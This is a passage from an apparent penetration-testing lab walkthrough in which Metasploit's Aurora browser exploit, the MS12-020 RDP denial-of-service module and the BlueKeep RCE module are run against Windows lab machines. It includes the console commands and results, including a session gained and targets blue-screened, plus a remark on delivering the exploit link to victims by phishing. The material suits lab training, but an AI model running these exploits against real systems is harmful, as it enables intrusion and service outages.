msf5 exploit(windows/browser/ms10_002_aurora) > run
As shown in the figure, the module generates a URL, http://192.168.244.128:8080/EMoyg47, to be delivered to victims (phishing, social engineering and so on). This is a client-side exploit: nothing happens until a vulnerable browser loads the page.
Open it in an affected Internet Explorer on Windows (XP here).
Check on Kali whether a session was opened (as shown in the figure, the session was established).
Test by interacting with the session
msf5 exploit(windows/browser/ms10_002_aurora) > sessions -i 3
5.4 ms12-020 (blue screen)
msf5 exploit(windows/browser/ms10_002_aurora) > search ms12-020
msf5 exploit(windows/browser/ms10_002_aurora) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options
Target: Windows 7 (RDP must be enabled, as it was in 5.1; this is a denial-of-service module, not a code-execution exploit)
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 192.168.244.137
rhosts => 192.168.244.137
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run
Windows 7 has blue-screened.
5.5 CVE-2019-0708 BlueKeep (blue screen)
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > search cve_2019_0708_bluekeep
msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets
Set the target host and the target id (the victim is Windows 7 SP1 on VMware 15.5.0, so target 5 is used; normally the target's platform is fingerprinted first)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 192.168.244.137
rhosts => 192.168.244.137
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 5
target => 5
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show options
Launch the attack
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
The Windows 7 target has blue-screened. The target ids of this module are keyed to the hypervisor the victim runs on because the kernel groom depends on a platform-specific address; a target that does not match the host crashes the machine instead of returning a session, which is what happened here.